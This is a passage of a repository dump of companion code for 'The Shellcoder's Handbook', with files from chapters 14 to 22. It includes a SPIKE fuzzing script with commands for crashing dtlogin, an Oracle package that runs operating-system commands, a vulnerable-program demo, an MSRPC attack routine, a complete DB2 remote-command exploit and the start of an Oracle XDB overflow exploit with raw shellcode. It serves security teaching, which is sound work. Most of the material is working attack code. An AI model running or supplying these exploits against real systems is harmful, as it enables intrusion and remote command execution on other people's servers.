memcpy(pcon_len,conlenbuffer,new_conlen_size); 231 | 232 | *mod_req_size = *mod_req_size+test; 233 | 234 | free(postdata); 235 | 236 | return(0); 237 | }; 238 | -------------------------------------------------------------------------------- /Chapter_14/src/RIOT.dsp: -------------------------------------------------------------------------------- 1 | # Microsoft Developer Studio Project File - Name="RIOT" - Package Owner=<4> 2 | # Microsoft Developer Studio Generated Build File, Format Version 6.00 3 | # ** DO NOT EDIT ** 4 | 5 | # TARGTYPE "Win32 (x86) Console Application" 0x0103 6 | 7 | CFG=RIOT - Win32 Debug 8 | !MESSAGE This is not a valid makefile. To build this project using NMAKE, 9 | !MESSAGE use the Export Makefile command and run 10 | !MESSAGE 11 | !MESSAGE NMAKE /f "RIOT.mak". 12 | !MESSAGE 13 | !MESSAGE You can specify a configuration when running NMAKE 14 | !MESSAGE by defining the macro CFG on the command line. For example: 15 | !MESSAGE 16 | !MESSAGE NMAKE /f "RIOT.mak" CFG="RIOT - Win32 Debug" 17 | !MESSAGE 18 | !MESSAGE Possible choices for configuration are: 19 | !MESSAGE 20 | !MESSAGE "RIOT - Win32 Release" (based on "Win32 (x86) Console Application") 21 | !MESSAGE "RIOT - Win32 Debug" (based on "Win32 (x86) Console Application") 22 | !MESSAGE 23 | 24 | # Begin Project 25 | # PROP AllowPerConfigDependencies 0 26 | # PROP Scc_ProjName "" 27 | # PROP Scc_LocalPath "" 28 | CPP=cl.exe 29 | RSC=rc.exe 30 | 31 | !IF "$(CFG)" == "RIOT - Win32 Release" 32 | 33 | # PROP BASE Use_MFC 0 34 | # PROP BASE Use_Debug_Libraries 0 35 | # PROP BASE Output_Dir "Release" 36 | # PROP BASE Intermediate_Dir "Release" 37 | # PROP BASE Target_Dir "" 38 | # PROP Use_MFC 0 39 | # PROP Use_Debug_Libraries 0 40 | # PROP Output_Dir "Release" 41 | # PROP Intermediate_Dir "Release" 42 | # PROP Target_Dir "" 43 | # ADD BASE CPP /nologo /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /c 44 | # ADD CPP /nologo /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /c 45 | # ADD BASE RSC /l 0x409 /d "NDEBUG" 46 | # ADD RSC /l 0x409 /d "NDEBUG" 47 | BSC32=bscmake.exe 48 | # ADD BASE BSC32 /nologo 49 | # ADD BSC32 /nologo 50 | LINK32=link.exe 51 | # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /machine:I386 52 | # ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /machine:I386 53 | 54 | !ELSEIF "$(CFG)" == "RIOT - Win32 Debug" 55 | 56 | # PROP BASE Use_MFC 0 57 | # PROP BASE Use_Debug_Libraries 1 58 | # PROP BASE Output_Dir "Debug" 59 | # PROP BASE Intermediate_Dir "Debug" 60 | # PROP BASE Target_Dir "" 61 | # PROP Use_MFC 0 62 | # PROP Use_Debug_Libraries 1 63 | # PROP Output_Dir "Debug" 64 | # PROP Intermediate_Dir "Debug" 65 | # PROP Target_Dir "" 66 | # ADD BASE CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /GZ /c 67 | # ADD CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /GZ /c 68 | # ADD BASE RSC /l 0x409 /d "_DEBUG" 69 | # ADD RSC /l 0x409 /d "_DEBUG" 70 | BSC32=bscmake.exe 71 | # ADD BASE BSC32 /nologo 72 | # ADD BSC32 /nologo 73 | LINK32=link.exe 74 | # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /debug /machine:I386 /pdbtype:sept 75 | # ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /debug /machine:I386 /pdbtype:sept 76 | 77 | !ENDIF 78 | 79 | # Begin Target 80 | 81 | # Name "RIOT - Win32 Release" 82 | # Name "RIOT - Win32 Debug" 83 | # Begin Group "source" 84 | 85 | # PROP Default_Filter ".cpp" 86 | # Begin Source File 87 | 88 | SOURCE=.\FaultInject.cpp 89 | # End Source File 90 | # Begin Source File 91 | 92 | SOURCE=.\NetIO.cpp 93 | # End Source File 94 | # Begin Source File 95 | 96 | SOURCE=.\RIOT.cpp 97 | # End Source File 98 | # End Group 99 | # Begin Group "include" 100 | 101 | # PROP Default_Filter "" 102 | # Begin Source File 103 | 104 | SOURCE=.\FaultInject.h 105 | # End Source File 106 | # Begin Source File 107 | 108 | SOURCE=.\NetIO.h 109 | # End Source File 110 | # End Group 111 | # End Target 112 | # End Project 113 | -------------------------------------------------------------------------------- /Chapter_14/src/RIOT.dsw: -------------------------------------------------------------------------------- 1 | Microsoft Developer Studio Workspace File, Format Version 6.00 2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE! 3 | 4 | ############################################################################### 5 | 6 | Project: "RIOT"=".\RIOT.dsp" - Package Owner=<4> 7 | 8 | Package=<5> 9 | {{{ 10 | }}} 11 | 12 | Package=<4> 13 | {{{ 14 | }}} 15 | 16 | ############################################################################### 17 | 18 | Global: 19 | 20 | Package=<5> 21 | {{{ 22 | }}} 23 | 24 | Package=<3> 25 | {{{ 26 | }}} 27 | 28 | ############################################################################### 29 | 30 | -------------------------------------------------------------------------------- /Chapter_14/src/input_store/1.dat: -------------------------------------------------------------------------------- 1 | GET /search.ida?group=kuroto&q=riot HTTP/1.1 2 | Accept: */* 3 | Accept-Language: en-us 4 | Accept-Encoding: gzip, deflate 5 | User-Agent: Mozilla/4.0 6 | Host: 192.168.1.1 7 | Connection: Keep-Alive 8 | Cookie: ASPSESSIONIDQNNNNTEG=ODDDDIOANNCXXXXIIMGLLNNG 9 | 10 | 11 | -------------------------------------------------------------------------------- /Chapter_14/src/input_store/2.dat: -------------------------------------------------------------------------------- 1 | GET /eeye.printer?varname=vardat HTTP/1.1 2 | Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* 3 | Accept-Language: en-us 4 | Accept-Encoding: gzip, deflate 5 | User-Agent: Mozilla/4.0 6 | Host: www.kuroto.na 7 | Connection: Keep-Alive 8 | Cache-Control: no-cache 9 | 10 | -------------------------------------------------------------------------------- /Chapter_14/src/input_store/3.dat: -------------------------------------------------------------------------------- 1 | GET /eeye.htr?varname=vardat HTTP/1.1 2 | Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* 3 | Accept-Language: en-us 4 | Accept-Encoding: gzip, deflate 5 | User-Agent: Mozilla/4.0 6 | Host: www.kuruoto.na 7 | Connection: Keep-Alive 8 | Cache-Control: no-cache 9 | 10 | -------------------------------------------------------------------------------- /Chapter_15/Shellcoders15-dtloginspike.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 15: Art of Fuzzing 10 | dtlogin SPIKE 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | //xdmcp_request.spk 17 | //compatable with SPIKE 2.6 or above 18 | //port 177 UDP 19 | //use these requests to crash it: 20 | //[dave@localhost src]$ ./generic_send_udp 192.168.1.104 177 ~/spikePRIVATE/xdmcp_request.spk 2 28 2 21 | //[dave@localhost src]$ ./generic_send_udp 192.168.1.104 177 ~/spikePRIVATE/xdmcp_request.spk 4 19 1 22 | 23 | //version 24 | s_binary("00 01"); 25 | //Opcode (request=07) 26 | //3 is onebyte 27 | //5 is two byte big endian 28 | s_int_variable(0x0007,5); 29 | //message length 30 | //s_binary("00 17 "); 31 | s_binary_block_size_halfword_bigendian("message"); 32 | s_block_start("message"); 33 | //display number 34 | s_int_variable(0x0001,5); 35 | //connections 36 | s_binary("01"); 37 | //internet type 38 | s_int_variable(0x0000,5); 39 | //address 192.168.1.100 40 | //connection 1 41 | s_binary("01"); 42 | //size in bytes 43 | //s_binary("00 04"); 44 | s_binary_block_size_halfword_bigendian("ip"); 45 | //ip 46 | s_block_start("ip"); 47 | s_binary("c0 a8 01 64"); 48 | s_block_end("ip"); 49 | //authentication name 50 | //s_binary("00 00"); 51 | s_binary_block_size_halfword_bigendian("authname"); 52 | s_block_start("authname"); 53 | s_string_variable(""); 54 | s_block_end("authname"); 55 | 56 | //authentication data 57 | s_binary_block_size_halfword_bigendian("authdata"); 58 | s_block_start("authdata"); 59 | s_string_variable(""); 60 | s_block_end("authdata"); 61 | //s_binary("00 00"); 62 | //authorization names (2) 63 | //3 is one byte 64 | s_int_variable(0x02,3); 65 | 66 | //size of string in big endian halfword order 67 | s_binary_block_size_halfword_bigendian("MIT"); 68 | s_block_start("MIT"); 69 | s_string_variable("MIT-MAGIC-COOKIE-1"); 70 | s_block_end("MIT"); 71 | 72 | 73 | s_binary_block_size_halfword_bigendian("XC"); 74 | s_block_start("XC"); 75 | s_string_variable("XC-QUERY-SECURITY-1"); 76 | s_block_end("XC"); 77 | 78 | 79 | //manufacture display id 80 | s_binary_block_size_halfword_bigendian("DID"); 81 | s_block_start("DID"); 82 | s_string_variable(""); 83 | s_block_end("DID"); 84 | 85 | s_block_end("message"); 86 | -------------------------------------------------------------------------------- /Chapter_17/Shellcoders17sampleprogram01.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 17: Instrumented Investigation 10 | Sample Program #1 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | Rem 17 | Rem oracmd.sql 18 | Rem 19 | Rem Run system commands via Oracle database servers 20 | Rem 21 | Rem Bugs to david@ngssoftware.com 22 | Rem 23 | 24 | CREATE OR REPLACE LIBRARY exec_shell AS 25 | 'C:\winnt\system32\msvcrt.dll'; 26 | / 27 | show errors 28 | CREATE OR REPLACE PACKAGE oracmd IS 29 | PROCEDURE exec (cmdstring IN CHAR); 30 | end oracmd; 31 | / 32 | show errors 33 | CREATE OR REPLACE PACKAGE BODY oracmd IS 34 | PROCEDURE exec(cmdstring IN CHAR) 35 | IS EXTERNAL 36 | NAME "system" 37 | LIBRARY exec_shell 38 | LANGUAGE C; end oracmd; 39 | / 40 | show errors 41 | -------------------------------------------------------------------------------- /Chapter_18/Shellcoders18-vtinject-cpp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/devzero2000/shellcoderhandbook/9da300b22f82e3b9f0888de60e6fb2a029a53a0e/Chapter_18/Shellcoders18-vtinject-cpp.txt -------------------------------------------------------------------------------- /Chapter_18/Shellcoders18-vulntrace-cpp.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 18: Tracing for Vulnerabilities 10 | vulntrace.cpp 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | /* 17 | * VulnTrace.cpp 18 | */ 19 | 20 | #include "stdafx.h" 21 | #include 22 | #include 23 | #include "detours.h" 24 | 25 | DWORD get_mem_size(char *block) 26 | { 27 | DWORD fnum=0, 28 | memsize=0, 29 | *frame_ptr=NULL, 30 | *prev_frame_ptr=NULL, 31 | *stack_base=NULL, 32 | *stack_top=NULL; 33 | 34 | __asm mov eax, dword ptr fs:[4] 35 | __asm mov stack_base, eax 36 | __asm mov eax, dword ptr fs:[8] 37 | __asm mov stack_top, eax 38 | __asm mov frame_ptr, ebp 39 | 40 | if( block < (char *)stack_base && block > (char *)stack_top) 41 | for(fnum=0;fnum<=5;fnum++) 42 | { 43 | if( frame_ptr < (DWORD *)stack_base && frame_ptr > stack_top) 44 | { 45 | prev_frame_ptr = (DWORD *)*frame_ptr; 46 | 47 | if( prev_frame_ptr < stack_base && prev_frame_ptr > stack_top) 48 | { 49 | if(frame_ptr < (DWORD *)block && (DWORD *)block < prev_frame_ptr) 50 | { 51 | memsize = (DWORD)prev_frame_ptr - (DWORD)block; 52 | break; 53 | } 54 | else 55 | frame_ptr = prev_frame_ptr; 56 | } 57 | } 58 | } 59 | 60 | return(memsize); 61 | } 62 | 63 | DETOUR_TRAMPOLINE(char * WINAPI real_lstrcpynA(char *dest,char *source,int maxlen), lstrcpynA); 64 | 65 | 66 | char * WINAPI vt_lstrcpynA (char *dest,char *source,int maxlen) 67 | { 68 | char dbgmsg[1024]; 69 | LPTSTR retval; 70 | 71 | _snprintf(dbgmsg, sizeof(dbgmsg), "[VulnTrace]: lstrcpynA(0x%08x:[%d], %s, %d)\n",dest,get_mem_size(dest), source, max-len); 72 | dbgmsg[sizeof(dbgmsg)-1] = 0; 73 | 74 | OutputDebugString(dbgmsg); 75 | 76 | retval = real_lstrcpynA(dest, source, maxlen); 77 | 78 | return(retval); 79 | } 80 | 81 | BOOL APIENTRY DllMain( HANDLE hModule, 82 | DWORD ul_reason_for_call, 83 | LPVOID lpReserved 84 | ) 85 | { 86 | if (ul_reason_for_call == DLL_PROCESS_ATTACH) 87 | { 88 | DetourFunctionWithTrampoline((PBYTE)real_lstrcpynA, (PBYTE)vt_lstrcpynA); 89 | } 90 | else if (ul_reason_for_call == DLL_PROCESS_DETACH) 91 | { 92 | OutputDebugString("[*] Unloading VulnTrace\n"); 93 | } 94 | 95 | return TRUE; 96 | } 97 | -------------------------------------------------------------------------------- /Chapter_18/Shellcoders18sampleprogram01.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 18: Tracing for Vulnerabilities 10 | Sample Program #1 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | /* Vulnerable Program (vuln.c)*/ 17 | 18 | #include 19 | #include 20 | 21 | #define USERMAXSIZE 32 22 | #define USERMAXLEN 16 23 | 24 | int check_username(char *username) 25 | { 26 | char buffer[USERMAXLEN]; 27 | 28 | lstrcpynA(buffer, username, USERMAXSIZE-1); 29 | 30 | /* 31 | Other function code to examine username 32 | ... 33 | */ 34 | 35 | return(0); 36 | } 37 | 38 | int main(int argc, char **argv) 39 | { 40 | if(argc != 2) 41 | { 42 | fprintf(stderr, "Usage: %s \n", argv[0]); 43 | exit(-1); 44 | } 45 | while(1) 46 | { 47 | check_username(argv[1]); 48 | Sleep(1000); 49 | } 50 | return(0); 51 | } 52 | -------------------------------------------------------------------------------- /Chapter_20/Shellcoders20-rsc-c.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 20: Alternative Payload Strategies 10 | rsc.c 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | // rsc.c 17 | // Simple windows remote system call mechanism 18 | 19 | #include 20 | #include 21 | #include 22 | #include 23 | 24 | int Marshall( unsigned char flags, unsigned size, unsigned char *data, unsigned char *out, unsigned out_len ) 25 | { 26 | out[0] = flags; 27 | *((unsigned *)(&(out[1]))) = size; 28 | memcpy( &(out[5]), data, size ); 29 | 30 | return size + 5; 31 | } 32 | 33 | //////////////////////////// 34 | // Parameter Flags ///////// 35 | //////////////////////////// 36 | 37 | // this thing is a pointer to a thing, rather than the thing itself 38 | #define IS_PTR 0x01 39 | 40 | // everything is either in, out or in | out 41 | #define IS_IN 0x02 42 | #define IS_OUT 0x04 43 | 44 | // null terminated data 45 | #define IS_SZ 0x08 46 | 47 | // null short terminated data (e.g. unicode string) 48 | #define IS_SZZ 0x10 49 | 50 | 51 | //////////////////////////// 52 | // Function Flags ////////// 53 | //////////////////////////// 54 | 55 | // function is __cdecl (default is __stdcall) 56 | #define FN_CDECL 0x01 57 | 58 | 59 | int AsmDemarshallAndCall( unsigned char *buff, void *loadlib, void *getproc ) 60 | { 61 | // params: 62 | // ebp: dllname 63 | // +4 : fnname 64 | // +8 : num_params 65 | // +12 : out_param_size 66 | // +16 : function_flags 67 | // +20 : params_so_far 68 | // +24 : loadlibrary 69 | // +28 : getprocaddress 70 | // +32 : address of out data buffer 71 | 72 | _asm 73 | { 74 | // set up params - this is a little complicated 75 | // due to the fact we're calling a function with inline asm 76 | 77 | push ebp 78 | sub esp, 0x100 79 | mov ebp, esp 80 | mov ebx, dword ptr[ebp+0x158]; // buff 81 | mov dword ptr [ebp + 12], 0; 82 | mov eax, dword ptr [ebp+0x15c];//loadlib 83 | mov dword ptr[ebp + 24], eax; 84 | mov eax, dword ptr [ebp+0x160];//getproc 85 | mov dword ptr[ebp + 28], eax; 86 | 87 | mov dword ptr [ebp], ebx; // ebx = dllname 88 | 89 | sub esp, 0x800; // give ourselves some data space 90 | mov dword ptr[ebp + 32], esp; 91 | 92 | jmp start; 93 | 94 | // increment ebx until it points to a '0' byte 95 | skip_string: 96 | mov al, byte ptr [ebx]; 97 | cmp al, 0; 98 | jz done_string; 99 | inc ebx; 100 | jmp skip_string; 101 | 102 | done_string: 103 | inc ebx; 104 | ret; 105 | 106 | start: 107 | // so skip the dll name 108 | call skip_string; 109 | 110 | // store function name 111 | mov dword ptr[ ebp + 4 ], ebx 112 | 113 | // skip the function name 114 | call skip_string; 115 | 116 | // store parameter count 117 | mov ecx, dword ptr [ebx] 118 | mov edx, ecx 119 | mov dword ptr[ ebp + 8 ], ecx 120 | 121 | // store out param size 122 | add ebx,4 123 | mov ecx, dword ptr [ebx] 124 | mov dword ptr[ ebp + 12 ], ecx 125 | 126 | // store function flags 127 | add ebx,4 128 | mov ecx, dword ptr [ebx] 129 | mov dword ptr[ ebp + 16 ], ecx 130 | 131 | add ebx,4 132 | 133 | // in this loop, edx holds the num parameters we have left to do. 134 | 135 | next_param: 136 | cmp edx, 0 137 | je call_proc 138 | 139 | mov cl, byte ptr[ ebx ]; // cl = flags 140 | inc ebx; 141 | 142 | mov eax, dword ptr[ ebx ]; // eax = size 143 | add ebx, 4; 144 | 145 | mov ch,cl; 146 | and cl, 1; // is it a pointer? 147 | jz not_ptr; 148 | 149 | mov cl,ch; 150 | 151 | // is it an 'in' or 'inout' pointer? 152 | and cl, 2; 153 | jnz is_in; 154 | 155 | // so it's an 'out' 156 | // get current data pointer 157 | mov ecx, dword ptr [ ebp + 32 ] 158 | push ecx 159 | 160 | // set our data pointer to end of data buffer 161 | add dword ptr [ ebp + 32 ], eax 162 | add ebx, eax 163 | dec edx 164 | jmp next_param 165 | 166 | is_in: 167 | push ebx 168 | 169 | // arg is 'in' or 'inout' 170 | // this implies that the data is contained in the received packet 171 | add ebx, eax 172 | dec edx 173 | jmp next_param 174 | 175 | 176 | not_ptr: 177 | mov eax, dword ptr[ ebx ]; 178 | push eax; 179 | add ebx, 4 180 | dec edx 181 | jmp next_param; 182 | 183 | call_proc: 184 | // args are now set up. let's call... 185 | mov eax, dword ptr[ ebp ]; 186 | push eax; 187 | mov eax, dword ptr[ ebp + 24 ]; 188 | call eax; 189 | mov ebx, eax; 190 | mov eax, dword ptr[ ebp + 4 ]; 191 | push eax; 192 | push ebx; 193 | mov eax, dword ptr[ ebp + 28 ]; 194 | call eax; // this is getprocaddress 195 | call eax; // this is our function call 196 | 197 | // now we tidy up 198 | add esp, 0x800; 199 | add esp, 0x100; 200 | pop ebp 201 | } 202 | 203 | return 1; 204 | } 205 | 206 | 207 | 208 | int main( int argc, char *argv[] ) 209 | { 210 | unsigned char buff[ 256 ]; 211 | unsigned char *psz; 212 | DWORD freq = 1234; 213 | DWORD dur = 1234; 214 | DWORD show = 0; 215 | HANDLE hk32; 216 | void *loadlib, *getproc; 217 | char *cmd = "cmd /c dir > c:\\foo.txt"; 218 | 219 | psz = buff; 220 | 221 | strcpy( psz, "kernel32.dll" ); 222 | psz += strlen( psz ) + 1; 223 | 224 | strcpy( psz, "WinExec" ); 225 | psz += strlen( psz ) + 1; 226 | 227 | *((unsigned *)(psz)) = 2; // parameter count 228 | psz += 4; 229 | 230 | *((unsigned *)(psz)) = strlen( cmd ) + 1; // parameter size 231 | psz += 4; 232 | 233 | // set fn_flags 234 | *((unsigned *)(psz)) = 0; 235 | psz += 4; 236 | 237 | psz += Marshall( IS_IN, sizeof( DWORD ), (unsigned char *)&show, psz, sizeof( buff ) ); 238 | psz += Marshall( IS_PTR | IS_IN, strlen( cmd ) + 1, (unsigned char *)cmd, psz, sizeof( buff ) ); 239 | 240 | hk32 = LoadLibrary( "kernel32.dll" ); 241 | loadlib = GetProcAddress( hk32, "LoadLibraryA" ); 242 | getproc = GetProcAddress( hk32, "GetProcAddress" ); 243 | 244 | AsmDemarshallAndCall( buff, loadlib, getproc ); 245 | 246 | return 0; 247 | } 248 | -------------------------------------------------------------------------------- /Chapter_21/Shellcoders21sampleprogram01.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 15: Writing Exploits that Work in the Wild 10 | Sample Program #1 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | def runTest(self): 17 | UUID2K3="1d55b526-c137-46c5-ab79-638f2a68e869" 18 | callid=1 19 | error,s=msrpcbind(UUID2K3,1,0,self.host,self.port,callid) 20 | if error==0: 21 | errstr="Could not bind to the msrpc service for 2K3,XP - as-suming NT 4 or Win2K" 22 | self.log(errstr) 23 | else: 24 | if self.testFor2003(): #Simple test not shown here. 25 | self.setVersion(15) 26 | self.log("Test indicated connection succeeded to msrpc service.") 27 | self.log("Attacking using version %d: %s"%(self.version,self.versions[self.version][0])) 28 | return 1 29 | 30 | self.setVersion(1) #default to Win2K or XP 31 | UUID2K="000001a0-0000-0000-c000-000000000046" 32 | #only provided by 2K and above 33 | callid=1 34 | error,s=msrpcbind(UUID2K,0,0,self.host,self.port,callid) 35 | if error==0: 36 | errstr="Could not bind to the msrpc service for 2K and above - assuming NT 4" 37 | self.log(errstr) 38 | self.setVersion(14) #NT4 39 | else: 40 | self.log("Test indicated connection succeeded to msrpc ser-vice.") 41 | self.log("Attacking using version %d: %s"%(self.version,self.versions[self.version][0])) 42 | return 1 #Windows 2000 or XP 43 | 44 | callid=0 45 | #IRemoteDispatch UUID 46 | UUID="4d9f4ab8-7d1c-11cf-861e-0020af6e7c57" 47 | error,s=msrpcbind(UUID,0,0,self.host,self.port,callid) 48 | #error is reversed, sorry. 49 | if error==0: 50 | errstr="Could not bind to the msrpc service necessary to run the attack" 51 | self.log(errstr) 52 | return 0 53 | #we assume it's vulnerable if we can bind to it 54 | self.log("Test indicated connection succeeded to msrpc ser-vice.") 55 | self.log("Attacking using version %d: %s"%(self.version,self.versions[self.version][0])) 56 | 57 | 58 | return 1 59 | -------------------------------------------------------------------------------- /Chapter_22/Shellcoders22-ibm-db2-exploit.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 22: Attacking Database Software 10 | IBM DB2 Exploit 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | #include 17 | #include 18 | 19 | int main(int argc, char *argv[]) 20 | { 21 | char buffer[540]=""; 22 | char NamedPipe[260]="\\\\"; 23 | HANDLE rcmd=NULL; 24 | char *ptr = NULL; 25 | int len =0; 26 | DWORD Bytes = 0; 27 | 28 | if(argc !=3) 29 | { 30 | printf("\n\tDB2 Remote Command Exploit.\n\n"); 31 | printf("\tUsage: db2rmtcmd target \"command\"\n"); 32 | printf("\n\tDavid Litchfield\n\t(david@ngssoftware.com)\n\t6th Septem-ber 2003\n"); 33 | return 0; 34 | } 35 | 36 | strncat(NamedPipe,argv[1],200); 37 | strcat(NamedPipe,"\\pipe\\DB2REMOTECMD"); 38 | 39 | // Setup handshake message 40 | ZeroMemory(buffer,540); 41 | buffer[0]=0x01; 42 | ptr = &buffer[4]; 43 | strcpy(ptr,"DB2"); 44 | len = strlen(argv[2]); 45 | buffer[532]=(char)len; 46 | 47 | // Open the named pipe 48 | rcmd = CreateFile(NamedPipe,GENERIC_WRITE|GENERIC_READ,0, 49 | NULL,OPEN_EXISTING,0,NULL); 50 | 51 | if(rcmd == INVALID_HANDLE_VALUE) 52 | return printf("Failed to open pipe %s. Error %d.\n",NamedPipe,GetLastError()); 53 | 54 | // Send handshake 55 | len = WriteFile(rcmd,buffer,536,&Bytes,NULL); 56 | 57 | if(!len) 58 | return printf("Failed to write to %s. Error %d.\n",NamedPipe,GetLastError()); 59 | 60 | ZeroMemory(buffer,540); 61 | strncpy(buffer,argv[2],254); 62 | 63 | // Send command 64 | len = WriteFile(rcmd,buffer,strlen(buffer),&Bytes,NULL); 65 | if(!len) 66 | return printf("Failed to write to %s. Error %d.\n",NamedPipe,GetLastError()); 67 | 68 | // Read results 69 | while(len) 70 | { 71 | len = ReadFile(rcmd,buffer,530,&Bytes,NULL); 72 | printf("%s",buffer); 73 | ZeroMemory(buffer,540); 74 | } 75 | 76 | return 0; 77 | } 78 | -------------------------------------------------------------------------------- /Chapter_22/Shellcoders22-xdb-exploit-linux.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/devzero2000/shellcoderhandbook/9da300b22f82e3b9f0888de60e6fb2a029a53a0e/Chapter_22/Shellcoders22-xdb-exploit-linux.txt -------------------------------------------------------------------------------- /Chapter_22/Shellcoders22-xdb-exploit-win32.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 22: Attacking Database Software 10 | Windows XDB overflow exploit 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | #include 17 | #include 18 | #include 19 | 20 | int GainControlOfOracle(char *, char *); 21 | int StartWinsock(void); 22 | int SetUpExploit(char *,int); 23 | 24 | struct sockaddr_in s_sa; 25 | struct hostent *he; 26 | unsigned int addr; 27 | char host[260]=""; 28 | 29 | 30 | unsigned char exploit[508]= 31 | "\x55\x8B\xEC\xEB\x03\x5B\xEB\x05\xE8\xF8\xFF\xFF\xFF\xBE\xFF\xFF" 32 | "\xFF\xFF\x81\xF6\xDC\xFE\xFF\xFF\x03\xDE\x33\xC0\x50\x50\x50\x50" 33 | "\x50\x50\x50\x50\x50\x50\xFF\xD3\x50\x68\x61\x72\x79\x41\x68\x4C" 34 | "\x69\x62\x72\x68\x4C\x6F\x61\x64\x54\xFF\x75\xFC\xFF\x55\xF4\x89" 35 | "\x45\xF0\x83\xC3\x63\x83\xC3\x5D\x33\xC9\xB1\x4E\xB2\xFF\x30\x13" 36 | "\x83\xEB\x01\xE2\xF9\x43\x53\xFF\x75\xFC\xFF\x55\xF4\x89\x45\xEC" 37 | "\x83\xC3\x10\x53\xFF\x75\xFC\xFF\x55\xF4\x89\x45\xE8\x83\xC3\x0C" 38 | "\x53\xFF\x55\xF0\x89\x45\xF8\x83\xC3\x0C\x53\x50\xFF\x55\xF4\x89" 39 | "\x45\xE4\x83\xC3\x0C\x53\xFF\x75\xF8\xFF\x55\xF4\x89\x45\xE0\x83" 40 | "\xC3\x0C\x53\xFF\x75\xF8\xFF\x55\xF4\x89\x45\xDC\x83\xC3\x08\x89" 41 | "\x5D\xD8\x33\xD2\x66\x83\xC2\x02\x54\x52\xFF\x55\xE4\x33\xC0\x33" 42 | "\xC9\x66\xB9\x04\x01\x50\xE2\xFD\x89\x45\xD4\x89\x45\xD0\xBF\x0A" 43 | 